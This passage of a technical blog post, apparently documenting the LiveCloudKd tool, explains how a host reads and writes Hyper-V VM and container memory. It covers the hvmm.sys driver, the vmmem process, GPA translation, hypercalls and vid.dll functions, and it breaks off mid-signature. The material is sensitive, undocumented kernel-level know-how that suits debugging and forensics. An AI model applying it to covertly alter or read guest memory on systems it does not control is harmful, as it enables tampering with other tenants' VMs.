<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It made by next function of hvmm.sys driver:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BOOLEAN</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VidGetContainerMemoryBlock(</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVM_PROCESS_CONTEXT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pPartitionHandle</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PCHAR</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pBuffer</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">len</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPA</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before executing it, as for Full VM, we must get partition handle first. Then, we will additionally need vmmem process handle. This process is created, when containers work, and works in kernel mode only. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see it’s threads, when launched container on a 4-processor PC (there are no user mode threads):</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 294px; overflow: hidden; width: 398px;"><img height="294" src="https://lh3.googleusercontent.com/HTmOlLkPKrkngfY3DbXObsqF31FeJ6KN_jc007gvEW-akpyXvFVBIFyufjczFFR-rbcpNXNdxRw6kUSwXMBFBMv6CINnDFMFwEZ_J9hEMvh458S5kAmeanrb1-kR8dYhA_IA6Jk" style="margin-left: 0px; margin-top: 0px;" width="398" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The vmmem process descriptor is present in the partition handle. We can find it, using ‘scrP’ signature (see the hvmm!VidFindVmmemHandle function for details).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We get a pointer to the GPAR object, as same way for reading memory in Full VM. Next we see differences - other fields of the GPAR structure are used to read blocks of memory. VmmMemGpaOffset - the main offset, which allows us convert GPA to SPA for a specific memory block. There is additional offset present (SomeGpaOffset), which can influence to final result, but during my experiments it was always 0.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 391px;"><img height="135" src="https://lh4.googleusercontent.com/hXlITwIKmVNPoI74hKdfcXgmHH_Ld7AtbwhXVBbUnRprgkrnfLrqH8jxmaR2kAmAw2B4xzUj_F4ZbCrMXbki31CtGnA2b_cwkwdSmMywsBqIskqcZx9WIXYDFGKjCKwFGHqMGpk" style="margin-left: 0px; margin-top: 0px;" width="391" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we calculate source address, using the following formula and copy data block directly from the address space of vmmem process:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 194px; overflow: hidden; width: 429px;"><img height="194" src="https://lh4.googleusercontent.com/ZdgbsEwhtqF6Vgj20bz-UjjahaXkl3V9QBaLAIZ3p0ufDoZB6iFx806K5bKK-hNRT3CdsLxMkBzP6OzEgXACzYoUJniW3udiIShsyiQoJfCNy4zp8c9mn7yFldwYmpC5Yhzhpzk" style="margin-left: 0px; margin-top: 0px;" width="429" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Now we can see key difference between reading container memory from reading Full VM memory: we need copy data from virtual memory of the vmmem process. There is no need for memory mapping using MDL.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hyper-V memory API</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Direct access to memory without corresponding exported Windows functions is interesting, but a more reliable method is to use some of APIs, which is provided by Microsoft. But for reliability you will have to pay the restrictions imposed by Microsoft on these APIs. In particular, for hypercalls they work only with Full VM and for containers they always return FALSE, additionally they read\write no more than 0x10 bytes at one time. The vid.dll function API is generally forbidden to be called from any module other than the vmwp.exe process in latest versions of Windows.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vid.dll has next functions for reading\writing memory:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidTranslateGvaToGpa</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidReadMemoryBlockPageRange (wrapper on vid.sys!VidReadWriteMemoryBlockPageRange)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidWriteMemoryBlockPageRange (wrapper on vid.sys!VidReadWriteMemoryBlockPageRange)</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And hypercalls (it must be called from ring 0):</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvTranslateVirtualAddress</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvWriteGPA</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvReadGPA</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See it in more detailed.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Reading\writing memory using hypercalls</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvReadGpa using is quite simple, if you don’t take, that memory block shouldn’t fall on the page boundary. Otherwise, the reading operation will be broken and end of block, that must be read from the second page, will contain zero bytes. Blocking separation is implemented in the usermode part of LiveCloudKdSdk. Driver hvmm calls WinHvReadGPA - HvReadGpa wrapper from winhvr.sys driver. You can call HvReadGpa directly through vmcall, but before you will have to additionally perform operations to prepare hypercall parameters.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 53px; overflow: hidden; width: 624px;"><img height="53" src="https://lh4.googleusercontent.com/9_EYwlFDlMdn9-Urxl7N7FgWUHc8jCfTwb4bYxEPUMOmtcEf9BCydcTpxGOa4dU8XnEvdTc_yNCSARZifLY0SHo_Pw1ZnmlAfuG4V38GznMr9uCKnSfoZWyHKasQlC_y28IOCS4" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Boundary checking for writing operation was made in hvmm.sys driver.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 89px; overflow: hidden; width: 577px;"><img height="89" src="https://lh3.googleusercontent.com/FDLbPx0CEfkrHCU8uIVkIejvsDwBl-8KmbQTAeNpF4h1Q5RogPl5vqHTIkU1dIPl39focov8vbedAnqT1Pf-LUcLr0F1mC8tOa5puM7bzWNTkuAiMNi9rBx-qQ-Pcs8kjclpgMI" style="margin-left: 0px; margin-top: 0px;" width="577" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">An additional check is performed before reading virtual address space using winhvr.sys!WinHvTranslateVirtualAddress. The function converts a virtual address into a physical one, using the current context of the CPU (and accordingly, CR3 register).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Possible validation options (LiveCloudKd uses only HV_TRANSLATE_GVA_VALIDATE_READ and HV_TRANSLATE_GVA_VALIDATE_WRITE).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_VALIDATE_READ</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0001)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_VALIDATE_WRITE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0002)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_VALIDATE_EXECUTE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0004)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_PRIVILEGE_EXEMPT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0008)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_SET_PAGE_TABLE_BITS</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0010)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_TLB_FLUSH_INHIBIT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0020)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_CONTROL_MASK</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x003F)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG in memory dump mode works with physical addresses only (for debugger it is file offsets). Accordingly, it makes all the work for converting virtual address to physical, therefore we don’t need to do additional hypercall for checking memory address.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Microsoft Hyper-V Virtualization Infrastructure Driver Library (vid.dll) API</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, see vid.dll!VidReadMemoryBlockPageRange</span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VIDDLLAPI</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BOOL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WINAPI</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidReadMemoryBlockPageRange(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PT_HANDLE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
